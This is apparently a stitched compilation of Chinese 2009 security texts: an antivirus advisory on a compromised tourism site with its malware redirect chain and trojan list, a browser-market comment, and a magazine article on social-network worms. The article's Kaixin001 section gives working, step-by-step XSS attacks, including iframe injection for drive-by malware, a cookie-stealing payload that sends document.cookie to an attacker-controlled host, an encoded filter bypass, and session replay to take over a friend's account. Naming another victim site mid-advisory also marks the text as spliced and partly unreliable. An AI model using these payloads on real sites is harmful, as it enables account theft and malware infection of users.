2009年9月15日，安天实验室发现，中国旅游招商网 http://www.cliccing.com/)，被黑客植入恶意代码，用户如果访问该网站，系统会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制，盗取用户敏感信息。甚至导致死机。
中国旅游招商网挂马页面：

安天防线2009拦截图：

挂马层次结构：
[wide http://www.cliccing.com/ (被挂马页面)
    [script]http://z3***.net/c.js （恶意跳转链接）
        [iframe]http://z3***.net/0.htm （恶意跳转链接）
            [iframe http://ee00r.22***.org/fkzd/16.htm （恶意跳转链接）
                [iframe http://wm.245a***.cn/x150/xx.html （集成网马页面）
                    [iframe http://wm.245a***.cn/x150/td14.htm （MS06-014漏洞）
                        [script http://wm.245a***.cn/x150/14.js
                        [script http://wm.245a***.cn/x150/15.js
                        [script http://wm.245a***.cn/x150/17.js
                        [script http://wm.245a***.cn/x150/16.js
                        [script http://wm.245a***.cn/x150/18.js
                    [iframe http://wm.245a***.cn/x150/yt.htm （MS09-032漏洞）
                        [script http://wm.245a***.cn/x150/a3.jpg
                        [script http://wm.245a***.cn/x150/b.jpg
                        [script http://wm.245a***.cn/x150/url.jpg   �...
                        [script http://wm.245a***.cn/x150/c.jpg
                        [script http://wm.245a***.cn/x150/d.jpg
                        [script http://wm.245a***.cn/x150/e.jpg
                        [script http://wm.245a***.cn/x150/f.jpg
                    [iframe http://wm.245a***.cn/x150/td09.htm （MS09-002漏洞）
                        [script http://wm.245a***.cn/x150/091.js
                        [script http://wm.245a***.cn/x150/092.js
                    [iframe http://wm.245a***.cn/x150/yut.htm （子集成网马页面）
                        [iframe http://wm.245a***.cn/x150/ytfl.htm （Adobe Reader PDF文件漏洞）
                            [iframe http://wm.245a***.cn/x150/ff.html
                            [iframe http://wm.245a***.cn/x150/ie.html
                            [iframe http://wm.245a***.cn/x150/ff.html
                            [iframe http://wm.245a***.cn/x150/ie.html
                            [iframe http://wm.245a***.cn/x150/ff.html
                            [iframe http://wm.245a***.cn/x150/ff.html
                        [iframe http://wm.245a***.cn/x150/ytfl1.htm  （Adobe Flash Player SWF文件漏洞）
                            [iframe http://wm.245a***.cn/x150/y1.htm
                                [script http://wm.245a***.cn/x150/swfobject.js
                                [flash http://wm.245a***.cn/x150/./x1.swf
                                [flash http://wm.245a***.cn/x150/./x3.swf
                                [flash http://wm.245a***.cn/x150/./x4.swf
                                [flash http://wm.245a***.cn/x150/./x2.swf
                                [flash http://wm.245a***.cn/x150/./x5.swf
                            [iframe http://wm.245a***.cn/x150/t2.htm
                                [script http://wm.245a***.cn/x150/swfobject.js
                                [flash http://wm.245a***.cn/x150/./x7.swf
                                [flash http://wm.245a***.cn/x150/./x9.swf
                                [flash http://wm.245a***.cn/x150/./x10.swf
                                [flash http://wm.245a***.cn/x150/./x8.swf
                                [flash http://wm.245a***.cn/x150/./x11.swf
                            [iframe http://wm.245a***.cn/x150/y1.htm
                        [iframe http://wm.245a***.cn/x150/of.htm （OWC10.Spreadsheet漏洞）
                            [script http://wm.245a***.cn/x150/of.js    �...               
                            [script http://wm.245a***.cn/x150/of3.jpg
                            [script http://wm.245a***.cn/x150/of.jpg
                            [script http://wm.245a***.cn/x150/of2.jpg

 

该挂马网页利用以下漏洞进行传播：
MS06-014漏洞
MS09-032漏洞
MS09-002漏洞
Adobe Flash Player SWF文件漏洞
Adobe Reader PDF文件漏洞
OWC10.Spreadsheet msDataSourceObject Method Stack Overflow Exploit

具体漏洞描述与解决方案请参见：
http://www.antiy.com/cn/security/2009/solution.htm

当用户访问挂马网站，系统会自动下载病毒文件：
    当用户访问中国电信股份有限公司上海研究所 http://www.sttri.com.cn/)时，含有漏洞的系统会自动从恶意网站下载大量病毒文件，并在本机上运行，病毒文件主要以网络游戏盗号类木马为主，病毒的具体描述信息如下：
1、网页木马直接下载的病毒文件：
 http://d.doi***.com/xx/x150.css 病毒名：Trojan/Win32.Agent.bcos[Dropper]
病毒描述：
连接网络，读取病毒下载列表进而下载病毒文件，并在本机运行
衍生文件：
c:\Documents and Settings\a\Local Settings\Temp\~291781.ext
2、下载者木马读取下载列表地址：
 http://txt.dol***.com/xx.txt
3、由下载者木马下载的其他病毒文件：
 http://1.dox***.com/img/1.exe 病毒名：Trojan/Win32.Agent.bbgl[Dropper]
病毒描述：DNF游戏盗号木马
衍生文件：
c:\WINDOWS\system32\emHnPuBAaF7XjuXBbdxSg.dll
c:\WINDOWS\system32\dfc8ac3ed7da.dll
c:\WINDOWS\system32\comres.dll
c:\WINDOWS\Fonts\WD7eC3pJvgmYQYNwrVP.Ttf

 http://1.dox***.com/img/2.exe 病毒名：Trojan/Win32.Agent.ayqa[Dropper]
病毒描述：梦话西游****游戏盗号木马
衍生文件：
c:\WINDOWS\Tasks\SgF9z49Ph7g5UNpM.ico
c:\WINDOWS\****ed Program Files\UYTbcaZtxE23MEzKGQ.cur

 http://1.dox***.com/img/3.exe 病毒名：Trojan/Win32.Magania.bwsr[GameThief]
病毒描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\SrNRKs5F7Rkv9hp.inf
c:\WINDOWS\****ed Program Files\JjedvMTDtPyqp9ZTrgw.Ttf

 http://1.dox***.com/img/4.exe 病毒名：Trojan/Win32.Magania.bwsr[GameThief]
病毒描述：****游戏盗号木马
衍生文件：
c:\WINDOWS\system32\K7zkXuSVDPKyz63k3V.inf
c:\WINDOWS\****ed Program Files\v2FhcJ32apapSmSX.Ttf

 http://1.dox***.com/img/5.exe 病毒名：Trojan/Win32.Agent.ayqa[Dropper]
病毒描述：大话西游 ii游戏盗号木马
衍生文件：
c:\WINDOWS\Tasks\eMjD9Pb8SvNVU8mM.ico
c:\WINDOWS\Tasks\ybmux4Mu6FUnQJEHWu.inf

 http://1.dox***.com/img/6.exe 病毒名：Trojan/Win32.Magania.bwsr[GameThief]
病毒描述：封神榜•网络版游戏盗号木马
衍生文件：
c:\WINDOWS\system32\3a5XTcKYzK7KZcrfRE.inf
c:\WINDOWS\****ed Program Files\sKQvCqpPty77uXqj.Ttf

 http://1.dox***.com/img/7.exe 病毒名：Trojan/Win32.Agent.ayqa[Dropper]
病毒描述：游戏盗号木马
衍生文件：
c:\WINDOWS\Tasks\vC6ykXbjUGCVeCJa.ico
c:\WINDOWS\****ed Program Files\WUstNjhyfQfpv8PQbC.cur

 http://1.dox***.com/img/8.exe 病毒名：Trojan/Win32.Agent.ayqa[Dropper]
病毒描述：神鬼传奇游戏盗号木马
衍生文件：
c:\WINDOWS\Tasks\x7j7yet9WK9FdYSD.ico
c:\WINDOWS\Tasks\CgbYR44s5jCmgAd6ar.inf

 http://1.dox***.com/img/9.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
病毒描述：封神榜•网络版游戏盗号木马
衍生文件：
c:\WINDOWS\system32\2exJW3dsaTgWrf5uAPadmHN.dll
c:\WINDOWS\Fonts\HXxfduw9KeQTCeP6Z.Ttf

 http://1.dox***.com/img/10.exe 病毒名：Trojan/Win32.Magania.bwsi[GameThief]
病毒描述：****游戏盗号木马
衍生文件：
c:\WINDOWS\****ed Program Files\v2FhcJ32apapSmSX.Ttf
c:\WINDOWS\****ed Program Files\6YYnDBbzHzrrmenHmv.cur

 http://2.dox***.com/img/11.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
病毒描述：完美世界游戏盗号木马
衍生文件：
c:\WINDOWS\system32\122B901E.dll
c:\WINDOWS\Fonts\cFDPmh3MDPjcHMPd.Ttf

 http://2.dox***.com/img/12.exe 病毒名：Backdoor/Win32.Small.ye
病毒描述：后门类木马
衍生文件：
C:\WINDOWS\71M.exe

 http://2.dox***.com/img/13.exe 病毒名：Trojan/Win32.Magania.biht[GameThief]
病毒描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\SCEVFJRCmaB7.dll
c:\WINDOWS\Fonts\G8qZ5hBX7H.Ttf

 http://2.dox***.com/img/14.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
病毒描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\CDuAUVkGy9.dll
c:\WINDOWS\Fonts\2knxWtV****WXmUdGG.Ttf

 http://2.dox***.com/img/15.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
病毒描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\704C3595.dll
c:\WINDOWS\Fonts\S8a8cnEuaydPJGg8.Ttf

 http://2.dox***.com/img/16.exe 病毒名：Trojan/Win32.Agent.ayqa[Dropper]
病毒描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\PERrGx5DkqSbQdwauCRQH.dll
c:\WINDOWS\Fonts\eSEWZRdrSK3NeEJVy4.Ttf

 http://2.dox***.com/img/17.exe 病毒名：Trojan/Win32.Magania.bwyr[GameThief]
病毒描述：封神榜网络版游戏盗号木马
衍生文件：
c:\WINDOWS\system32\BtmBAnd89jc9PsPq5EKNj.inf
c:\WINDOWS\****ed Program Files\uMub3WCE6aZ3nFgrYRX.Ttf

 http://2.dox***.com/img/18.exe 病毒名：Trojan/Win32.Magania.bwxz[GameThief]
病毒描述：剑侠世界游戏盗号木马
衍生文件：
c:\WINDOWS\system32\skcfujQ5EDN.dll
c:\WINDOWS\Fonts\YywxhF7TSnkktrJw.Ttf

 http://2.dox***.com/img/19.exe 病毒名：Trojan/Win32.Magania.bful[GameThief]
病毒描述：游戏盗号木马
衍生文件：
c:\WINDOWS\Fonts\RCZbVbjCY6wYszD3.Ttf
c:\WINDOWS\Fonts\A97CRaCB.fon

 http://2.dox***.com/img/20.exe 病毒名：Trojan/Win32.Magania.bwxz[GameThief]
病毒描述：诛仙、口袋西游游戏盗号木马
衍生文件：
c:\WINDOWS\system32\rfpz9wwyy2np.dll
c:\WINDOWS\Fonts\vztr58qstaca8y8j.Ttf

 http://2.dox***.com/img/22.exe 病毒名：Trojan/Win32.Magania.bwsr[GameThief]
病毒描述：游游戏盗号木马
衍生文件：
c:\WINDOWS\system32\pEcFwPj48y6DADf87r.inf
c:\WINDOWS\****ed Program Files\EpapzVpa3DRCkpPR.Ttf

 http://2.dox***.com/img/23.exe 病毒名：Trojan/Win32.Magania.bwsr[GameThief]
病毒描述：游游戏盗号木马
衍生文件：
c:\WINDOWS\system32\eYNMAnskCCBQCc8Jp.inf
c:\WINDOWS\****ed Program Files\WFsARAucm7DAuX8.Ttf

 http://2.dox***.com/img/24.exe 病毒名：Trojan/Win32.Magania.bwsr[GameThief]
病毒描述：仙剑游游戏盗号木马
衍生文件：
c:\WINDOWS\system32\P6VyQtQJUYa3rFan7J.inf
c:\WINDOWS\****ed Program Files\eVaMpZ3AmmmbCPjX.Ttf

 http://2.dox***.com/img/25.exe 病毒名：Trojan/Win32.Magania.bwsr[GameThief]
病毒描述：封神榜网络版游游戏盗号木马
衍生文件：
c:\WINDOWS\system32\B4yNKrEEhEerKFeeA4.inf
c:\WINDOWS\****ed Program Files\PRKUkXR8NQ8ydQmw.Ttf

 http://2.dox***.com/img/26.exe 病毒名：Trojan/Win32.Magania.bkii[GameThief]
病毒描述：游游戏盗号木马
衍生文件：
c:\WINDOWS\system32\qzp3jTZCSfSh.dll
c:\WINDOWS\Fonts\qWskzsQA6.Ttf

 http://2.dox***.com/img/27.exe 病毒名：Trojan/Win32.Magania.bwxz[GameThief]
病毒描述：大话西游3游戏盗号木马
衍生文件：
c:\WINDOWS\system32\ndxq9awMc.dll
c:\WINDOWS\Fonts\CRp3uYCmcxMp3qQn9.Ttf

 http://2.dox***.com/img/28.exe 病毒名：Trojan/Win32.Slefdel.edn
病毒描述：游戏盗号木马
衍生文件：
c:\WINDOWS\71C.exe

 http://2.dox***.com/img/29.exe 病毒名：Trojan/Win32.Magania.bwxz[GameThief]
病毒描述：武林2、诛仙、口袋西游游戏盗号木马
衍生文件：
c:\WINDOWS\system32\dhDhwS7fFW.dll
c:\WINDOWS\Fonts\cD9KArZZUHxCqnyM.Ttf

 http://2.dox***.com/img/30.exe 病毒名：Trojan/Win32.Magania.bfrp[GameThief]
病毒描述：华夏2游戏盗号木马
衍生文件：
c:\WINDOWS\system32\2EF0D734.dll
c:\WINDOWS\Fonts\Qq3qg7RGSp9raxWW.Ttf

 http://2.dox***.com/img/31.exe 病毒名：Trojan/Win32.Agent.ayqa[Dropper]
病毒描述：游戏盗号木马
衍生文件：
c:\WINDOWS\Tasks\vC6ykXbjUGCVeCJa.ico
c:\WINDOWS\****ed Program Files\WUstNjhyfQfpv8PQbC.cur

 http://2.dox***.com/img/32.exe 病毒名：Trojan/Win32.Magania.biht[GameThief]
病毒描述：游戏盗号木马
衍生文件：
c:\WINDOWS\system32\DMvJFcDsGe5Kccsmc6gZFjB.inf
c:\WINDOWS\****ed Program Files\sFTeYEwVMFwRyW7hr.Ttf

 http://2.dox***.com/img/33.exe 病毒名：Trojan/Win32.Agent.adxr[Dropper]
病毒描述：ms08-067 exploit漏洞溢出木马
衍生文件：
c:\Documents and Settings\a\Local Settings\Temp\11231237

 http://2.dox***.com/img/35.exe 病毒名：Trojan/Win32.Agent.cwlm
病毒描述：Dropper类木马辅助，遍历进程查找结束QQ.EXE、监视QQ安全中心窗口如发现则将其窗口隐藏
衍生文件：
无
 http://2.dox***.com/img/36.exe 病毒名：Trojan/Win32.Agent.bcvr[Dropper]
病毒描述：QQ盗号木马
衍生文件：
c:\Program Files\Internet Explorer\Top.dll
c:\Program Files\Internet Explorer\Top.tmp
c:\Program Files\Internet Explorer\Top.bak

 http://2.dox***.com/img/37.exe 病毒名：Trojan/Win32.Small.kdk[****er]
病毒描述：木马下载器连接http://2.boksx.com/dd.exe下载病毒文件
衍生文件：
C:\DOCUME~1\a\LOCALS~1\Temp\459372

安天反病毒工程师建议：
1. 使用安天防线2009或锐甲可以有效防范此挂马网页。
2. 用安天防线2009可以查杀此挂马网页下载的病毒文件。
3. 请及时更新安天防线2009，以确保您的计算机安全，防止计算机病毒入侵。如未安装安天防线请点击此处（http://www.antiyfx.com/download.htm），免费下载最新版安天防线2009。

如今浏览器战争几乎打到了胶着的状态，先是Opera仗着欧盟将自己的浏览器挤进了Windows 7欧洲版之中，如今谷歌也和索尼达成协议，今后所有索尼公司出产的电脑之中都会预装谷歌Chrome浏览器。

但是不知道Chrome浏览器是预装到索尼电脑的Windows系统中呢？还是预装到索尼的Linux系统中，如果是预装到Windows系统之中，可能效果并不会像谷歌估计的那么乐观，毕竟索尼不能卸载删除了Windows中内置的IE浏览器，因此即便预装上Chrome，它做多也只能够算是一个替补选手，对于撼动IE的地位几乎没可能。

谷歌也野心十足，在和索尼合作成功后，谷歌打算将这种捆绑模式推而广之，进一步让更多的电脑品牌捆绑Chrome浏览器。不过对于这个模式谷歌绝对要小心一点儿，首先说不定Opera哪天有状告谷歌捆绑销售，另外想必硬件厂商也会心怀顾虑。

话说当年IBM和微软合作，最终促成了这个世界上最大的软件公司，如今虽然谷歌已经是互联网霸主，但是如果它在掌握了浏览器市场进一步进入软件领域，想必也不是所有硬件厂商愿意看到的。

社交网站遭遇蠕虫危机恐慌

 

当数年前冲击波蠕虫病毒在互联网上所制造破坏和恐惧，刚在中国网民的心中逐渐淡去的时候，从互联网当下最火爆的开心网、MySpace、校内网SNS社交网站不断袭来的蠕虫攻击却开始唤醒那部分尘封的记忆。在2009年过去的八个月中，几乎每个月都有社交网站爆发蠕虫攻击事件，网络安全专家将社交网站蠕虫比作个人隐私大盗，而且可能威胁到的不仅仅是个人隐私……

 

警告：蠕虫在蔓延！

8月25日，一个非常普通的星期二，然而在网络中的这一天，著名的中文SNS网络社区人人网却在经历一场与蠕虫的斗争。一个利用XSS跨站脚本漏洞进行传播的蠕虫正在伪装成为视频，疯狂快速的传播，而这距校内网更名称为人人网仅几天的时间。

这个脚本蠕虫病毒名为伪装在一个音乐视频中，并利用人人网的视频分享功能在用户之间疯狂传播。看似是一则普通Flash动画的视频文件中包含了一段恶意程序，一旦用户打开之后，内嵌在这则动画中的恶意网页会迅速在用户计算机中生成一个脚本程序，删除用户的网络日志，并开始盗用受害者的名义传播给他好友。

然而，这并非个案，早在4月份，拥有最多华人用户的IM软件QQ中的QZone空间就被黑客利用XSS脚本漏洞进行蠕虫散播，最终导致上万用户空间遭到袭击。而更早之前，百度空间也曾被黑客利用跨站脚本漏洞散播蠕虫病毒，近万名用户的百度空间成为了蠕虫的乐园。

这样的情况对于SNS社交网站来说才刚刚开始。进入2009年后透过SNS社交网站漏洞进行蠕虫传播开始越来越多，社交蠕虫几乎在以每月一个的速度诞生传播。不仅是数量上的增加，社交蠕虫也开始变得“贪婪”，蠕虫作者如今已经开始设定蠕虫在套取用户信息后向受害者的好友发送诈骗信息，企图获取钱财。

 

危机：开心网连爆漏洞！

在国内，依靠“争车位”、“朋友买卖”等几个简单的组件和病毒式的传播，开心网以一种不可思议的速度在各个办公室之间蔓延。借此Facebook引领的SNS社交网站也第一次真正地在中国的办公室一族当中获得追捧，成为了国内人气最热的SNS社交网站。

无疑，火爆的人气带来的是也有潜在的危险。

与百度空间、QZone一样，开心网早在今年年初就爆出过可被蠕虫利用的漏洞。不过，开心网仍然存在大量漏洞。本周，《电脑报》在第一时间收到多个开心网漏洞，而这些漏洞全是未公开，仅在黑客圈内部流传的0Day漏洞。

而这些漏洞之中，就存在能够被黑客利用编写社交蠕虫的高危漏洞。对于有经验的黑客，这个高危漏洞可以被他们很轻松地变成具有感染能力的社交网站蠕虫。只不过现在我们仍然无法知道，开心网是否能够及时的修补这些漏洞。

如果漏洞未能够及时修补，那么对于开心网所有的用户而言，这都是一个潜伏的定时炸弹。黑客可以通过编写蠕虫社交蠕虫感染至少数万名用户，获取到他们的个人信息、好友信息，这些信息足以构成一个环环相扣的人际关系网，黑客对于人际关系网又有多种利用方式，贩卖信息，诈骗，构造虚假身份等都可以实现。

这并不是一个悲观的推论，今年1月，美国居民布莱恩的朋友们从带有布莱恩照片的Facebook邮箱的电子邮件中读到，布莱恩出现了问题。在电子邮件中，布莱恩声称他遇到了大麻烦，需要朋友们的帮助。随后至少有一位朋友向他汇钱。然而事实上布莱恩并没有陷入麻烦，也不需要帮助，只是他的网站被网络犯罪分子利用了。

这只是一起针对社交网站Facebook的网络诈骗活动。

今年严重的MySpace蠕虫还导致了MySpace社交网站瘫痪数小时，许多用户反映因感染蠕虫，导致日志等文件被莫名其妙删除。

开心网的多个漏洞目前仍然存在，留给网站管理员修复的时间却要比黑客编写蠕虫的时间要少的多，黑客总会先一步网站掌握相关漏洞信息，这是一场速度与对抗的战争。

 

影响：被放大的蠕虫效应！

利用网站过滤不严，进行恶意的黑客攻击并不是一件新鲜事，但在没有开心网这样的SNS社区之前，利用跨站漏洞发动攻击的黑客最多是在知名网站的网页中挂木马，获取尽量多的肉鸡，或者是制造一串串的弹出窗口这种恶作剧式的玩笑。

SNS社交网站的出现改变了这一切。根据六度分隔理论的假设，世界上所有互不相识的人只需要很少中间人就能建立起联系，而平均只需六个人就可以联系任何两个互不相识的人。

在这个理论上发展处的SNS社交网站就是这样一个层层交织的社会关系网，当用户注册成为SNS社交网站用户的那一刻起，你就与社交网站中的好友建立了一种网状的联系，而这种的网状的联系会通过社区中的资源分享、小游戏等互动要素变得更加的紧密。这实际上是将原来分散的个人用户凝聚到了一起，并且是一个由交织网络的群体，而这个群体对于蠕虫传播而言是最理想的目标人群。

友情改变了一切。在SNS社交网站中不同，由于在SNS社交网站中的好友多数都是在网络之下相互认识的朋友，因此当黑客通过社交网站漏洞释放蠕虫病毒之后，同处在社交网站中的多数人会信任的打开自己好友发送来的短信或者分享的视频等信息，而此时每一个因为信任自己好友而打开带毒信息的人都加入了这条传播病毒的循环之中，成为了病毒的传播者。

从统计角度来看，物以类聚、人以群分。雅虎公司的研究人员几年前发现，如果一个人点击某条网上广告，他或她的聊天密友点击相同广告的几率是其他人的3倍或4倍。这个结论直接证明了朋友们乐于相互分享兴趣。而在SNS中，这成为了病毒传播的杀手锏。

这如同在人群密集处有一个传染性极强的流感患者，只需要很短的时间，通过人与人的接触，所有的人都会感染病毒。以前没有威力的跨站漏洞配合蠕虫在SNS社区中危险性被无限的放大了。

社区蠕虫能够造成的危害最终也可能超乎你的想象，通过SNS网络，一个蠕虫有可能获取你全部的好友圈信息，并冒充你发出各种诈骗信息。同样在SNS网络中，蠕虫还可以利用社会工程学，从你的好友那里骗取有关你的详细信息，让你的好友将这些信息发送到指定地点。而这些关键信息将有可能让黑客复制出你的一切，从身份证到信用卡，SNS蠕虫让社交网络变成一个危险未知的陷阱。

如今，各种各样的SNS网络在互联网这个大舞台上纵横交错，从交换信息到结交朋友，再到各取所好。我们也许从不会从安全角度衡量网络中的好友，但是对于病毒制造者而言，这种网络友情的价值将注定成为他们利用的最佳跳板，也注定SNS社交网站蠕虫将会有增无减。

 

对策：2.0时代的安全新规则

在国内著名安全机构“安天实验室”的安全专家眼中，目前威胁网络社区安全的并不是这些已知的蠕虫病毒，而是那些尚未发现或者已经被极少数黑客掌握的跨站漏洞。

跨站攻击方法自从诞生那天起没有受到足够的重视，对于Web1.0时代的网站来说，哪里出现问题修补哪里的灭火方式就可以足以防范这种漏洞。对黑客而言，在没有社交网站之前也没有理想的利用跨站漏洞攻击手段方，因此是不被人看好的鸡肋。

这直接造成了早期程序员不重视对于网站跨站漏洞的过滤检查。但当网站进入到Web 2.0时代的时候，那些以前不被重视的跨站被激活了，可以互动交互的模式激活了跨站成为蠕虫的特性，而网站此时却发现，自己并不知道还有什么地方存在XSS漏洞。

安天实验室监控显示，Web 2.0时代随着网站的交互性增强，跨站挂马、Cookie截获与Cookie追逐等以前不被视为高威胁或者安全威胁的技术已经开始变危险和泛滥。现今黑客已经开始利用社交网站蠕虫配合Cookie截获篡改获取用户密码好友圈等信息，Cookie截获配合跨站最终脱胎蜕变出了社区蠕虫。

面临这种威胁的并不只有社交网站，博客、微博等一系列的Web 2.0网站几乎都具有高度交互性，这些高度交互性的网站都存在蠕虫等新的安全隐患。因此制定Web 2.0时代的安全新规则将是未来应对网站新威胁的手段。

而作为个体，在新的蠕虫威胁面前，提高电脑的安全防护能力固然重要，同时也要提高安全知识的储备。每一个人都将是与社交蠕虫对抗的堡垒。希望看到，经过冲击波等网络病毒洗礼的网民，并不会因为曾经的记忆更加恐慌，而是能构筑起应对新安全威胁的网络防线，无论社交蠕虫是否真的会席卷网络，都能够正确地看待这次新安全威胁。

 

开心网漏洞解读

在这一次发现的开心网4个漏洞中，全部是因为网站过滤不严而导致。也正是因为这种过滤不严，而网站又由于结构复杂存在大量该类型的漏洞，让黑客可以借题发挥，通过和Cookie截获配合制造出能够引起严重后果的社交蠕虫。

目前，第一个漏洞出在群相册组件处，主要问题是iframe过滤不严；第二个漏洞出在音乐组件专辑名称处，主要问题是iframe也是过滤不严。

第三个漏洞出在音乐组件歌曲注释处，主要问题是iframe和img过滤不严。第四个漏洞出在音乐组件歌词处，主要问题是iframe、img、&#过滤不严，此处对输入的字符的长度没有限制，所以比较适合进行Cookie的窃取。漏洞的利用的代码是”><iframe src=http://www.baidu.com width=500 height=500></iframe>。

安全小百科：跨站漏洞就如同一个商场中没有保安和管理人员一样，在这样一个缺乏有效监管和审查的商场中，自然会有冒充商场人员的骗子混进来摆摊设点，而消费者则会将这些骗子误认为是商场的员工，被这些骗子骗了也会认为是被商场骗了，会将怒气发泄到商场身上。

 

四大开心网漏洞揭秘

群相册组件漏洞

漏洞危害：能用来挂马

漏洞原因：iframe过滤不严

漏洞状况：已通知修改

威胁指数：★★★★

最佳防护组合：卡巴斯基+安天防线

 

漏洞利用：首先，制作一个网页木马。例如下载一款Flash 漏洞生成器，在“生成”中输入木马的地址（该木马已经上传到指定的网站空间中），点击“生成”按钮即可，再将生成的网页木马上传到指定的网站空间中。

然后，注册一个开心网账号，用账号登录后进入群相册，创建一个群相册专辑。在群相册专辑名称处输入代码<iframe src=http://www.baidu.com width=500 height=500></iframe>（图1），点击“确定”按钮，百度就被嵌入到开心网中了（图2）。

接在，将上述代码中的www.baidu.com替换为木马地址，将width（嵌入框架的宽）和height（嵌入框架的高）的值都设为0，就可以挂马了。最后等用户浏览相册或者四处宣传引诱用户浏览相册就可以了。开心网在此处做了代码的长度限制，无法抓取Cookie窃取用户信息。

 

音乐组件专辑名称漏洞

漏洞危害：能用来挂马

漏洞原因：iframe过滤不严

漏洞状况：已通知修改

威胁指数：★★★★

最佳防护组合：卡巴斯基+安天防线

 

漏洞利用：在音乐组件中点击“创建新专辑”，在弹出的对话框中输入专辑名称处输入代码<iframe src=http://www.baidu.com width=500 height=500></iframe>（图3），点击“创建”按钮即可完成新专辑的创建。

点击新建的专辑名，进入播放界面后就会在左边弹出嵌入的百度页面（图4）。同理，如果我们把百度地址换成木马地址，将width和height的值都设为0就可以挂马了。最后等用户浏览音乐专辑或者四处宣传引诱用户浏览音乐专辑就可以了。

音乐组件歌曲注释漏洞

漏洞危害：能用来挂马

漏洞原因：iframe、img过滤不严

漏洞状况：已通知修改

威胁指数：★★

最佳防护组合：卡巴斯基+安天防线

 

漏洞利用：首先，随便上传一首MP3歌曲。点击“音乐”，任意输入一个专辑名称，再点击“创建→上传歌曲”，在此处输入歌曲名称、类型等信息，点击“下一步→继续上传步骤→浏览”，选择一个音乐文件，点击“开始上传”。

然后在注释文本框中输入代码<iframe src=http://www.baidu.com width=500 height=500></iframe>（图5），点击“确定”按钮，百度出现在了开心网的歌词注释处（图6）。同理，把百度地址换成木马地址，将width和height的值都设为0就可以挂马了。最后四处宣传链接，引诱用户点击链接即可激活木马。

 

 

音乐组件歌词漏洞

漏洞危害：能用来挂马、窃取Cookie信息

漏洞原因：iframe、img、&#过滤不严

漏洞状况：已通知修改

威胁指数：★★★★★

最佳防护组合：卡巴斯基+安天防线

 

第一步:进入补充歌词页面，在“LRC歌词”文本框中输入跨站代码<iframe src=http://www.baidu.com width=500 height=500></iframe>，点击“保存”按钮，再播放改音乐就可以看到百度了（图7）

第二步:准备好Cookie截取代码（网上下载），再创建一个名为Cookie.txt的纯文本文件，它的作用是记录已截取的Cookie信息。接下来将这两个文件上传到空间中，这时Cookie截取文件的地址就是http://www.yourname.com/Cookie.asp（yourname为实际域名地址）。

安全小百科：Cookie由服务器端生成，发送给浏览器，浏览器会将Cookie保存到某个目录下的文本文件内，下次请求同一网站时就发送该Cookie给服务器（前提是浏览器设置为启用Cookie）。Cookie名称和值可以由服务器端开发自己定义，这样服务器可以知道该用户是否合法用户以及是否需要重新登录等。

第三步：点击“修改歌曲信息 ”，在修改歌曲信息页面中的歌词处输入代码<img src=”cj.gif”onerror=”document.location=’http://www.yourname.com/Cookie.aspCookie=’+document.Cookie”/> （图8），点击“确定”按钮保存。

再点击歌曲右侧的“给好友点歌”，在弹出的点歌窗口中选择好友（图9），点击“确定”即可。当好友打开歌曲播放页面时，会跳出提示“开心网音乐组件正在维护中，给你带来的不便请谅解”（图10），此时他的Cookie信息已被截获（图11）。

 

安全小百科：要弹出提示窗口，需要把跨站代码转换成十进制输出（开心网过滤了script）。在网上随便找到一款代码转换器，将之前输入的代码转换为<IMG SRC=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#24320&#24515&#32593&#38899&#20048&#32452&#20214&#27491&#22312&#32500&#25252&#20013&#46&#46&#46&#32473&#24744&#24102&#26469&#30340&#19981&#20415&#35831&#35845&#35299&#39&#41>。

最后下载一款可以修改Cookie的浏览器，例如《Cookies浏览器》，打开开心网首页，在登录框处把我们刚刚截取到的Cookie替换到相应位置，然后点击“修改”就可以顺利登录好友的账号了（图12）。

 

我们的建议

相信开心网存在的XSS跨站漏洞不止我们上面了提到的这几个，如何才能查找到此类漏洞呢？除了手动对输入框逐一查找外，其实还有大量的XSS漏洞检测工具可供我们使用，如著名的XSS LFI File Disclosure Scanner、Paros 等，对全站页面结构进行扫描，极有可能发现新的安全漏洞。当然这类工具都是双刃剑，网站管理员可以用它来检测网站安全，黑客也可以用其找出网站漏洞实施攻击。

那么如何才能最大程度的避免出现此类漏洞呢？除了在网站建设初期加强对用户输入内容可靠性的限制管理外，还要做深入细致的检测，最基本的就是对有输入框页面的富文本输入进行代码测试，在测试过程中如页面有任何框架变形或脚本错误提示，即预示着此页面极有可能存在XSS跨站攻击漏洞。

此外，对带参数的链接也要进行参数替换测试，如我们之前报道的赶集网跨站漏洞就存在着对参数过滤不严的问题。同时，最好在网站开发的全程阶段，引入专业的黑盒与白盒测试工具，建立完善的富文本过滤层。相信做到上述这些后，定能极大的增强网站的安全性，做到滴水不漏。

 

（苗得雨 CJ也疯狂）

（本文已发表在最新一期《电脑报》）

 Cookies是小的数据包，里面包含着关于你网上冲浪习惯的信息，这随后就为因特网上了解cookies的站点所知。Cookie的主要用途是广告代理商用来追踪人口统计，查看某个站点吸引了那种消费者。一些网站还用cookies来保存你最近的帐号信息。这样，当你进入某个 
站点，比如说Amazon.com，而你又在该站点有帐号时，站点就会立刻知道你是谁，自动载入你的个人参数选项。这也就是象Yahoo！这样的站点是如何提供“myYahoo！”这种私人特色服务的。

  象Double-Click和NetGravity等公司都使用cookies来编译关于网上冲浪者的信息，回过头来这又被广告客户用来有目标地投递广告。在最为流行的搜索引擎Yahoo!中，你就可以看到一个采用这种策略的实例，当你第一次连接该站点时，它会显示一个表面看来随机的广告条。在你输入一个单词——比如说“待售书籍”——进行查找之后，广告条会突然开始吹捧Amazon.com。

  如何阻止cookies?

  是否有什么办法可以阻止cookies？当然！只要你使用的是Microsoft Internet Explorer版本3.0或其更高版本就行

  。IE中给出一个选项，能在你从某个站点接收cookie时显示一个警告信息，并且可让你拒绝此cookie。这只需到查看菜单，选中选项……。在选项对话框中，点击高级标签。将列表框向下滚动，把总是接受Cookies选项设为不选中状态。接着再选中接收cookies之前提示。

